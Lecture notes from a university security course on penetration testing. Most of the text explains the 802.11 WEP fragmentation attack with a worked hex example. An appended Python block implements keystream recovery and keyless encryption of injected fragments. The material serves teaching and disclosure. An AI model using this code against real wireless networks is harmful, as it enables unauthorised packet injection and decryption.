UW CSEP 590 - Lecture Notes

Hacking
Joshua Lackey, Ph.D.

Background
• Ph.D., Mathematics. University of Oregon. 1995 – 2000
• Senior Ethical Hacker. IBM Global Services. 1999 – 2005
• Security Software Developer. Microsoft SWI Attack Team. 2005 –

Introduction
Hacking as a White Hat

Requirements
• Technical Talk
• One 50 minute lecture
Personal Requirements
• Not boring

Question
Why would anyone spend $1.5k – $2k per day for a penetration test?

Answer
• Cost/benefit
• Risk analysis
  – how?
• Example
  – an MSRC bulletin costs between $100k and $200k.
  – design review, threat model review, history of product/feature, training statistics feed into the risk analysis.
  – this determines if more work must be performed.

Answer
The goal of any penetration test or ethical hack is to determine the truth.

Truth
Is what we believe, what we have been told, actually true?
Is what we designed, what we implemented, secure?

Truth
• Adversarial Situations
  – "of course we did this securely"
• Acquisitions
  – quality analysis
  – unknown environment
• Talent
  – "never even thought of that"

Truth
The best plans include security analysis in all phases of development.
• Design
  – Penetration testing during the design phase provides feedback before implementation.
  – The worst flaws are design flaws.
• Implementation
  – Software developers who understand how to write secure code.

Truth
Does it really cost $1.5k – $2k per day per penetration tester?
For top-level penetration testers, these are the standard security consultant's fees. The main reason is that the talent required is not so common.

Examples
Examples from work.
Problem: I cannot discuss any of my good examples.

Examples
Examples from my research.
– 802.11 Fragmentation Attack
– VW Key Fob
– GSM

Examples
Most of what I'm going to speak about is work in progress. There will be a lot of questions and very few answers.

802.11 Fragmentation Attack
(This is finished research.)
Serious design flaw – trying to gauge how much this cost is difficult. (Especially since most people/companies haven't addressed this…)
Would have been extremely difficult to find in the design phase anyway. (Although possible.)

802.11 Fragmentation Attack
Best previous attack: Weaknesses in the Key Scheduling Algorithm of RC4. Fluhrer, Mantin, Shamir.
• Vendors countered by not using weak IVs.
• Unfortunately, this was not enough. (Although many thought it was.)

802.11 Fragmentation Attack
A vulnerability exists in the IEEE 802.11 protocol which allows an attacker to transmit WEP-encrypted packets without knowing the encryption key. This vulnerability allows an attacker to decrypt packets as well.
This was disclosed to CERT on September 16, 2003.

802.11 Fragmentation Attack
RC4 Encryption
If we denote by E_k(P) the encryption of the plain-text message P by the RC4 encryption method with key k, we have
  E_k(P) = X + P
where X is the pseudo-random bit-stream generated by the RC4 PRGA with key k, and + denotes bitwise XOR. And thus
  E_k(P) + P = X

802.11 Fragmentation Attack
Logical Link Control Packets
The most common LLC/SNAP packet seen on an 802.11 network is the Ethernet type LLC with IP. Explicitly, this packet consists of the following eight bytes.
  P' = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00 }

802.11 Fragmentation Attack
Logical Link Control Packets
Each encrypted packet on an 802.11 network is encapsulated in a logical-link control packet. That is, each packet P is the concatenation of P', given above, and some P''.
  P = P' P''

802.11 Fragmentation Attack
Logical Link Control Packets
By the above comments on RC4, we can find the first eight bytes of the pseudo-random bit-stream X' generated by the key used to encrypt this packet,
  X' = E_k(P') + P'
Because we know the plain-text P', we can encrypt any arbitrary eight bytes with key k. We have, for any eight-byte text Q,
  E_k(Q) = X' + Q

802.11 Fragmentation Attack
802.11 Fragmentation
Section 9.4 of the 1999 IEEE 802.11 protocol specification provides a method to fragment packets when needed. Moreover, each fragment is encrypted individually.

802.11 Fragmentation Attack
By transmitting packets in fragments, an attacker can inject arbitrary packets into a WEP-encrypted 802.11 wireless network.

802.11 Fragmentation Attack Example
Capture a packet, including the 802.11 headers, off a WEP-encrypted network.
  08 41 02 01 00 04 5a 37 ee 75 00 0e 35 ea 75 17
  00 00 24 50 da 11 00 01 55 f9 47 00 db 76 e1 66
  14 cf 05 c5 51 06 95 41 70 06 2d 4f 96 0e 0a 01
  3c 6f fc bd 38 a2 21 02 33 0c 50 f1 e9 ae a4 8a
  5e 16 49 41

802.11 Fragmentation Attack Example
If we parse the 802.11 header, we find this packet contains the following.
  type: data frame, data only
  to_ds: 1, from_ds: 1, more_frag: 0,
  retry: 0, pwr_mgt: 0, more_data: 0,
  wep: 1, order: 0
  dur: 102
  a1: 00-04-5A-37-EE-75
  a2: 00-0E-35-EA-75-17
  a3: 00-00-24-50-DA-11
  seq: frag = 00, num = 0010
  data:
  55 f9 47 00 db 76 e1 66 14 cf 05 c5 51 06 95 41
  70 06 2d 4f 96 0e 0a 01 3c 6f fc bd 38 a2 21 02
  33 0c 50 f1 e9 ae a4 8a 5e 16 49 41

802.11 Fragmentation Attack Example
The first 10 encrypted data bytes are:
  db 76 e1 66 14 cf 05 c5 51 06
Assuming that we have an IPv4 packet with an Ethertype LLC/SNAP header, the plain-text data is:
  aa aa 03 00 00 00 08 00 45 00
Therefore the first ten bytes of the pseudo-random bit-stream are derived as follows.
    db 76 e1 66 14 cf 05 c5 51 06
  + aa aa 03 00 00 00 08 00 45 00
    -----------------------------
    71 dc e2 66 14 cf 0d c5 14 06

802.11 Fragmentation Attack Example
Suppose we wish to transmit an ICMP echo request.
  45 00 00 2c 7a 0f 00 00 ff 01 33 b9 01 02 03 04  E..,z.....3.....
  0a 01 00 02 08 00 6d 81 5d 02 2f 96 69 6e 6a 65  ......m.]./.inje
  63 74 65 64 20 70 61 63 6b 65 74 00              cted packet.

802.11 Fragmentation Attack Example
Break this packet into fragments.
  fragment 0:
    data: aa aa 03 00 00 00
    crc : f2 bb 67 21
  fragment 1:
    data: 08 00 45 00 00 2c
    crc : 22 e7 83 c3
  fragment 2:
    data: 25 4c 00 00 ff 01
    crc : 8a 4d 83 9f
  fragment 3:
    data: 88 7c 0a 01 00 02
    crc : a7 d1 72 ff
[…]
802.11
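The arithmetic of the slides above, worked through in Python as an added example (not code from the lecture): recover X' from the captured frame using the known LLC/SNAP prefix, then check that a 6-byte fragment plus its 4-byte ICV is exactly what 10 recovered keystream bytes cover. It assumes the 24-byte header offset implied by the slide's parse and computes the WEP ICV with zlib.crc32; the frame and ICMP bytes are copied from the slides.

```python
import struct
import zlib

# WEP data frame from the slide: 802.11 header, IV, key id, RC4 ciphertext.
CAPTURED_FRAME = bytes.fromhex(
    "08 41 02 01 00 04 5a 37 ee 75 00 0e 35 ea 75 17 "
    "00 00 24 50 da 11 00 01 55 f9 47 00 db 76 e1 66 "
    "14 cf 05 c5 51 06 95 41 70 06 2d 4f 96 0e 0a 01 "
    "3c 6f fc bd 38 a2 21 02 33 0c 50 f1 e9 ae a4 8a "
    "5e 16 49 41")
# P' (LLC/SNAP for IP) followed by the first two bytes of any IPv4 header.
KNOWN_PLAINTEXT = bytes.fromhex("aa aa 03 00 00 00 08 00 45 00")
# The ICMP echo request from the slide, used as sample payload P''.
ICMP_PACKET = bytes.fromhex(
    "45 00 00 2c 7a 0f 00 00 ff 01 33 b9 01 02 03 04 "
    "0a 01 00 02 08 00 6d 81 5d 02 2f 96 69 6e 6a 65 "
    "63 74 65 64 20 70 61 63 6b 65 74 00")

def xor(a: bytes, b: bytes) -> bytes:
    # Byte-wise XOR; the slides write this operation as '+'.
    return bytes(x ^ y for x, y in zip(a, b))

def recover_keystream(frame: bytes, known_plaintext: bytes) -> bytes:
    # Layout as parsed on the slide (assumption): 24-byte MAC header with
    # 3 addresses, 3-byte IV, 1-byte key id, then ciphertext. X' = E_k(P') + P'.
    ciphertext = frame[28:]
    return xor(ciphertext[:len(known_plaintext)], known_plaintext)

def wep_icv(plaintext: bytes) -> bytes:
    # WEP ICV: CRC-32 of the plaintext, appended little-endian.
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)

def fragment(plaintext: bytes, keystream: bytes) -> list:
    # Every fragment carries its own 4-byte ICV, so a 10-byte X' protects
    # at most 6 data bytes per fragment, exactly the size the slide uses.
    size = len(keystream) - 4
    return [plaintext[i:i + size] for i in range(0, len(plaintext), size)]

def encrypt_with_keystream(keystream: bytes, data: bytes) -> bytes:
    # E_k(Q || ICV(Q)) = X' + (Q || ICV(Q)): no key needed, only X'.
    body = data + wep_icv(data)
    if len(body) > len(keystream):
        raise ValueError("fragment longer than the recovered keystream")
    return xor(body, keystream)

def decrypt_and_verify(keystream: bytes, ciphertext: bytes):
    # Receiver side: an AP accepts a fragment only if the ICV matches,
    # which gives no protection here because the sender computes the ICV.
    body = xor(ciphertext, keystream)
    data, icv = body[:-4], body[-4:]
    return data if wep_icv(data) == icv else None
```

Running recover_keystream on CAPTURED_FRAME reproduces the slide's 71 dc e2 66 14 cf 0d c5 14 06, and fragmenting P' || ICMP_PACKET reproduces the slide's fragment 0 and fragment 1 data bytes.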

